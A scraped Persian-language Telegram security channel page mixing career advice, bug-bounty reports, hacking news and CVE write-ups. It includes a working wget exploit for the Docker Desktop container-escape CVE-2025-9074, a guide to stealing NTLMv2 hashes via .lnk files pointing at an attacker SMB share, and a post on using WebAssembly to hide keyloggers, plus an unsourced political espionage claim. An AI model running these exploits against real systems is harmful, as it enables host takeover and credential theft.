RadvanSec – Telegram
RadvanSec
989 subscribers
181 photos
27 videos
142 files
595 links
"Security is Just an Illusion"
" امنیت فقط یک توهم است "

RadvanSec.com

Youtube , Instagram : @RadvanSec
Download Telegram
RadvanSec
بنظرتون برای بچه هایی که میخوان تازه امنیت شروع کنن CEH دوره خوبیه یا نه؟
ببینید CEH به خودی خود شاید محتوای دوره ای لازمی نداشته باشه اما بنظر من کسی که میخواد از صفر شروع کنه و هیچ پیش زمینه و ذهنیتی درمورد امنیت نداره بنظرم خوبه و میتونه دید خوبی به امنیت بده و ذهنیت شمارو تو هک و امنیت به طرز قابل قبولی بالا ببره
پس زیادی سخت نگیرید و نسبت به هیچ دوره ای گارد نداشته باشید و دائم در حال یادگیری در مسیر درست باشید👌
👏51👍1👎1
📊 Watcher Summary Report

🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 12 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report


⭐️ @ZeroSec_team
👍2🔥1
what is webasm.pdf
5.7 MB
وب اسمبلی (Wasm) چیه؟

یه فرمت باینریه که کدهای مثل C++ و Rust رو میشه داخل مرورگر یا سرور خیلی سریع اجرا کرد.

چرا برای Red Team جالبه؟

سریع و سبک → کارایی بیشتر از JS

سخت آنالیز میشه → برای مخفی‌سازی خوبه

زیر رادار میره → بیشتر ابزارهای امنیتی دنبال JS هستن، نه Wasm

کاربرد رد تیم:

اجرای payload سنگین داخل مرورگر

مخفی‌سازی بدافزار یا keylogger

دور زدن detection و signatureها

استفاده در فیشینگ یا dropper

⭐️ @ZeroSec_team
4🔥2
Forwarded from HackMeLocal
🕹 یک مینی‌چالش جدید داریم!

این مدت احتمالاً دیدین که بعضی دیتاهای یه ربات تلگرام لیک شده.
اما این یعنی تلگرام آسیب‌پذیره؟
(فکررررررر نکنمممم 😏)

برای همین یک شبیه‌سازی ساختیم تا خودتون ببینید دیتا‌هایی که از ربات‌ها لیک می‌شن به چه صورت به دست میان.

یک ربات مخصوص رای‌گیری ساختیم:

@HML_Simulation_BOT

تو این ربات سه شخصیت برای رأی‌گیری آماده هستن:

🦆 DuckMen
🐺 Wolfy
👴 Just a random old man

می‌تونید هر چند بار که بخواید رأی بدید.
ولی این همه ماجرا نیست…

⚠️ یه آسیب‌پذیری توی سیستم رأی‌گیری قایم شده که می‌تونه لیست ادمین‌ها رو لو می‌ده.
ما نمی‌دونیم دقیقاً چجوری ادمین‌هامون لو میرن، اما اولین نفری که آسیب‌پذیری رو پیدا کنه و گزارش بده، رایت‌آپش به اسم خودش داخل سایت و کانال منتشر .

@HackMeLocal

#BugBounty #TelegramBot #Vulnrability #CTF #HackMeLocal
👍31🔥1
#معرفی_ابزار

ابزار vulnerability scanning برای وبسایت‌ها (مثل پیدا کردن باگ‌های XSS SSRF و OWASP Top 10) که رایگان حرفه‌ای و با دقت باشن محدودن اما یکی از بهترین گزینه‌ها

Pentest-Tools.com Website
همینه

آدرس سایت ابزار:
https://pentest-tools.com/website-vulnerability-scanning/website-scanner

ثبت‌نام: به سایت برید و با ایمیل رایگان ثبت‌نام کنید (بدون نیاز به پرداخت برای اسکن light)
وارد کردن آدرس سایت: در داشبورد، گزینه "Website Scanner" رو انتخاب کنید آدرس سایت (مثل example.com) رو وارد کنید. می‌تونید authenticated scan (با لاگین) یا unauthenticated انتخاب کنید.
شروع اسکن: اسکن light رایگان رو بزنید ابزار سایت رو crawl می‌کنه پورت‌ها و APIها رو چک می‌کنه، و باگ‌ها رو با evidence اسکرین‌شات HTTP requests پیدا می‌کنه.
گزارش: بعد از اسکن (معمولاً ۱۰-۳۰ دقیقه) گزارش PDF/HTML با جزئیات باگ‌ها severity (CVSS)، و توصیه‌های remediation می‌گیرید. برای اسکن کامل‌تر (۷۵+ باگ)، می‌تونید trial ۱۴ روزه بگیرید.

نکات حرفه‌ای:
از ML classifier برای کاهش false positives استفاده کنید (جدید در ۲۰۲۵)
با CI/CD integrate کنید برای اسکن خودکار.

همیشه authenticated scan رو برای سایت‌های لاگین‌دار امتحان کنید تا باگ‌های عمیق‌تر پیدا بشه

بیش از ۱۰,۰۰۰ CVE رو هم پوشش می‌ده از جمله Log4Shell و Citrix Bleed. اگر سایت بزرگی داری، false positives رو دستی verify کن.

⭐️ @ZeroSec_team
3
Forwarded from Deleted Account
Media is too big
VIEW IN TELEGRAM
برای مبتدی ها از صفر شروع می‌کنه و روی penetration testing وب تمرکز داره

"Ethical Hacking 101: Web App Penetration Testing"
و قدم به قدم توضیح
می‌ده چطور آسیب‌پذیری‌ها رو پیدا و تست کنی

اگر می‌خوای دوره کامل‌تری داشته باشی ویدیو "Ethical Hacking in 12 Hours - Full Course"
https://youtu.be/fNzpcB7ODxQ?si=LMjCuFdIqFIspSGG


⭐️ @ZeroSec_team
5👍2
وقتشه سطح آموزش رو ببریم بالا. اما شما کدومو می خواین؟
Anonymous Poll
53%
ساختن متدولوژی خودتون به عنوان پنتستر و هکر
20%
رود مپ Deep Osint
27%
بد افزار نویسی پیشرفته
5😭2🤔1
🔥 Red Team vs Bug Bounty: Clash or Collaboration?
3-Min Quick Guide!

🔥 رد تیم یا باگ بانتی: رقابت یا همکاری؟
راهنمای سریع ۳ دقیقه‌ای!

https://www.youtube.com/watch?v=fDeRAzU8IE0

از پیج یوتیوب ما حمایت کنید 💥

#RedTeam #BugBounty #Cybersecurity

⭐️ @ZeroSec_team
🔥31
RadvanSec
🔥 Red Team vs Bug Bounty: Clash or Collaboration? 3-Min Quick Guide! 🔥 رد تیم یا باگ بانتی: رقابت یا همکاری؟ راهنمای سریع ۳ دقیقه‌ای! https://www.youtube.com/watch?v=fDeRAzU8IE0 از پیج یوتیوب ما حمایت کنید 💥 #RedTeam #BugBounty #Cybersecurity …
سلام دوستان عزیزم امیدوارم حالتون خوب باشه ;
هدف از پر کردن این ویدیو این بود که بهتون بگم تعصبات تو هر رشته ای میتونه چقدر رویکرد نادرستی باشه
سعی کنید هیچوقت تک بعدی فکر نکنید تا ذهنتون رو بسته نگه ندارید خیلی موقع ها هدف از گفتن اینکه outofbox فکر کنید همین هست که شما سعی کنید چالش هایی که پیش روی شما میاد رو از راه هایی که شاید به نظر خیلی براتون خنده دار میاد رو انجام بدید اگر این رویکرد رو داشته باشید حتما نتایج خوبی خواهید گرفت
بگذریم همونطور که گفتم هدف از این ویدیو این بود که بگم خیلی اوقات ما از تکنیک های Red Team میتونیم در Bug Bounty استفاده کنیم و یا حتی از تکنیک های Bug Bounty در فرایند Red Team پس هر دو حوزه در جهت اهداف مشترکشون که ارتقاء امنیت سایبری هست بهم کمک میکنند ! در کل زیاد سخت نگیرید سعی کنید در حوزه ای که فعالیت میکنید از هم یادبگیرید و بهم بیاموزید …

ممنونم که وقت گذاشتید🙏

Linkedin : https://www.linkedin.com/feed/update/urn:li:activity:7367186170457341952/

Youtube : https://www.youtube.com/@nexovir

Twitter : https://x.com/nexovir

⭐️ @ZeroSec_team
7
📊 Watcher Summary Report

🔹 BUGCROWD: 2 new items
🔹 HACKERONE: 116 new items
🔹 INTIGRITI: 10 new items
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report


⭐️ @ZeroSec_team
2
Forwarded from GO-TO CVE
CVE-2024-12877-week-66.pdf
1002 KB
🎯 CVE-2024-12877 Review – GiveWP goes unserialize()… Hello RCE! ⚡️🔥
Hello hackers, bug hunters, and curious minds! Welcome to Episode 66 of the GO-TO CVE series! 🎙💻

This week we’re cracking open a classic PHP Object Injection inside GiveWP, one of the most popular WordPress donation plugins. 🕳🐘

🔹 Week: 66
🔹 CVE: CVE-2024-12877
🔹 Type: PHP Object Injection
🔹 Target: GiveWP (WordPress Plugin)

📌 What’s the story?
GiveWP uses PHP’s notorious unserialize() on user input. That means attackers can drop in a crafted serialized payload, and PHP will happily invoke magic methods like __wakeup() — executing attacker-controlled logic without warning.

👾 What’s the impact?

Remote Code Execution (RCE) 🚀
Sensitive data theft (donors, users, configs) 🕵️‍♂️
Privilege escalation across WordPress 🔑
Full server compromise ☠️

💡 Lesson learned: Regex checks won’t save you. The real fix? Never unserialize untrusted input.

📬 Stay tuned with GO-TO CVE for a fresh bug every week:
👉 https://news.1rj.ru/str/GOTOCVE

#week_66
7
Easy …

⭐️ @ZeroSec_team
5💯2
شرکت اسرائیلیDream Security فعال در زمینه هوش مصنوعی (AI) گزارش داده که هکرهایی ایرانی به مذاکرات دیپلماتیک در قاهره نفوذ کرده‌اند و این مذاکرات که با حضور رسمی‌هایی از مصر، ایالات متحده و قطر در حال برگزاری بود، هدف یک حمله سایبری قرار گرفته است.


نقطه شروع: هکرها از حساب ایمیل واقعی یکی از کارکنان سفارت عمان در پاریس سوء‌استفاده کردند و از آن حساب ایمیل‌هایی شبیه نامه‌های رسمی ارسال کردند.

گستره ارسال: این ایمیل‌ها حدود ۲۰۰ دریافت‌کننده را هدف قرار دادند — از جمله مقام‌های مصری حاضر در قاهره (و پاریس)، میانجی‌های آمریکایی و قطری و برخی نهادهای بین‌المللی.

ترفند فنی: متن‌ها پیوست‌های Word داشتند که در صورت باز شدن، بدافزار اجرا می‌کرد — توانایی‌هایی مانند خواندن مکاتبات، ضبط مکالمات/صداها و ارسال اطلاعات به سرورهای کنترل کننده (C2) را داشتند. هدفِ ظاهری عملیات جاسوسی و رصد مذاکرات بوده، نه لزوماً نابودی زیرساخت.

⭐️ @ZeroSec_team
🔥51
📊 Watcher Summary Report

🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 16 new items
🔹 INTIGRITI: 5 new items
🔹 YESWEHACK: 1 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report


⭐️ @ZeroSec_team
3👍2
کنکور اسکمه باگ بزنید 👎

لایک کنید برسه دست سنجش
18👎1
Forwarded from Xero Notes
🐋 آسیب‌پذیری CVE-2025-9074 در Docker Desktop

اخیرا از آسیب‌پذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را می‌دهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیب‌پذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی می‌توان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.

💥 این آسیب‌پذیری چطور به وجود آمده است؟

در Docker Desktop نسخه‌های قبل از ۴.۴۴.۳، هر کانتینری می‌توانست به API Docker با آدرس http://192.168.65.7:2375 دسترسی داشته باشد بدون اینکه نیاز به احراز هویت برای استفاده از آن داشته باشد.. با استفاده از این دسترسی، مهاجم می‌تواند یک کانتینر جدید با دسترسی‌های ویژه راه‌اندازی کرده و در نهایت به فولدر C: در سیستم میزبان دسترسی پیدا کند. لازم به ذکر است که این آسیب پذیری در نسخه مک نیز قابل استفاده است و امکان دسترسی روت را برای مهاجم فراهم می‌کند.

💠 نمونه کد برای آزمایش آسیب‌پذیری

ابتدا یک کانتینر Alpine بسازید.
docker run -it alpine /bin/sh


سپس با استفاده از پیلود زیر، آسیب‌پذیری را تست کنید.
wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /mnt/host_root/pwn.txt"],"HostConfig":{"Binds":["//c/host_root:/mnt/host_root"]}}' \
-O - http://192.168.65.7:2375/containers/create > create.json

cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start


این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
192.168.65.7:2375/containers/create


یک کانتینر جدید با دستور echo pwned > /mnt/host_root/pwn.txt می‌سازد و با استفاده از قابلیت Volume در Docker، مسیر C:/host_root را به mnt/host_root/ در داخل کانتینر مپ می‌کند.

📊 امتیاز CVSS

این آسیب‌پذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار می‌گیرد:

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H


راه‌حل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.

🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074

#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
5🔥1
هکر معروف هک شد!

اخیرا یک گروه هکری موسوم به «گمنامان»، مدعی شد که به ایمیل های گروه هکری معروف «بکدور» دسترسی پیدا کرده است. بک دور عنوان یک گروه هکری است که از سال 1401 و در پی وقوع اغتشاشات، بروز و ظهور پیدا کرد. این گروه هکری که مدعی اخذ دسترسی به سامانه های سازمان ثبت احوال کشور شده بود با افشای اسناد سجلی، هویت برخی افراد در داخل کشور ازجمله برخی نیروهای فراجا را منتشر مینمود. این گروه هکری سپس انتشار اسناد هویتی برخی خبرنگاران مشهور صداوسیما را نیز در دستور کار خود قرار داد. این اقدام که به طور واضح با هدف اعمال فشار به این چهره های رسانه ای انجام میشد با استقبال ویژه ی شبکه ی ایران اینترنشنال مواجه شد و به سرعت اخبار آن در رسانه های معاند انتشار یافته و نام این گروه هکری نیز برسر زبان ها افتاد.
حالا یک گروه هکری موسوم به گمنامان ادعا نموده که ایمیل گروه هکری معروف بکدور را هک نموده و به اسنادی از ارتباط پنهانی میان این گروه هکری و عوامل شبکه اینترنشنال دسترسی پیدا نموده که نشان میدهد «بکدور» از طریق آنان با موساد در ارتباط بوده است.
جالب اینجاست که در سندی که گمنامان از ایمیل های بک دور منتشرنموده، مشاهده میشود که نریمان غریب(چهره رسانه ای همکار با اینترنشنال و نزدیک به موساد) ابتدا از طریق ارسال ایمیل، از بکدور خواسته است تا اطلاعات هویتی پدر و مادر خودش یعنی نریمان غریب را به او بدهد تا بتواند صحت عملکرد بکدور را راستی آزمایی کند. پس از اطمینان از دسترسی بکدور به ثبت احوال کشور، سپس نریمان غریب سفارش داده است تا اطلاعات دونفر از خبرنگاران مشهور صداوسیما را به وی بدهد. این اطلاعات پس از چندی دستمایه رسانه ای شبکه ایران اینرنشنال شد.
حالا گروه هکری گمنامان در آخرین پست خود با انتشار جمله «هکر بودن به معنای مصونیت نیست؛ دیر یا زود، سراغتان خواهیم آمد.»به گروه های هکری که با سرویس های اطلاعاتی دشمن همکاری میکنند هشدار داده است.

⭐️ @ZeroSec_team
🔥11🤡4😁2👎1
🚨 آسیب‌پذیری Zero-Click جدید در ویندوز (CVE-2025-50154) 🚨

آسیب‌پذیری جدید به اسم CVE-2025-50154 کشف شده که پچ قبلی مایکروسافت (CVE-2025-24054) رو دور می‌زنه
این باگ به مهاجم اجازه می‌ده بدون نیاز به کلیک کاربر (Zero-Click) هش‌های NTLMv2 رو بدزده و حتی فایل‌های اجرایی رو بی‌سروصدا دانلود کنه

چطور میشه ازش سوءاستفاده کرد
با یه فایل .lnk ساده که مسیرش به یه سرور SMB مخرب (مثل \\evil-ip\share\bad.exe) اشاره داره و آیکونش از shell32.dll محلی لود می‌شه می‌تونید Windows Explorer رو گول بزنید وقتی Explorer فایل رو رندر می‌کنه (مثلاً تو پوشه Downloads) یه درخواست SMB می‌فرسته و بوم! هش NTLMv2 کاربر لو می‌ره تازه فایل اجرایی هم تو %TEMP% دانلود می‌شه

این هش‌ها برای NTLM Relay (مثلاً به LDAP یا SMB برای Domain Takeover) یا کرک آفلاین با Hashcat عالیه می‌تونید با ترکیبش با CVE-2025-53770 (باگ SharePoint) به RCE برسید
کد اثبات مفهوم تو GitHub (rubenformation) هست با Responder یا Impacket یه سرور SMB راه بندازید و تو چند ثانیه هش‌ها رو بگیرید. با Wireshark هم می‌تونید رفتار رو مانیتور کنید

لینک PoC
https://lnkd.in/d6w4Vk4p


🛡️برای عزیزان Blue Team: چطور جلوی این فاجعه رو بگیریم؟

ترافیک SMB خروجی رو با Zeek یا Suricata مانیتور کنید (دنبال NTLM Challenge/Response باشید) تو Event Viewer به Event ID 5145 نگاه کنید یا با EDR (مثل Defender یا CrowdStrike) رفتار مشکوک Explorer.exe رو رصد کنید


#امنیت_سایبری #ویندوز #آسیب_پذیری #Cybersecurity #RedTeam #BlueTeam #CVE_2025_50154 #NTLM #ZeroClick

⭐️ @ZeroSec_team
4❤‍🔥1
📊 Watcher Summary Report

🔹 BUGCROWD: 3 new items
🔹 HACKERONE: 61 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report


⭐️ @ZeroSec_team
4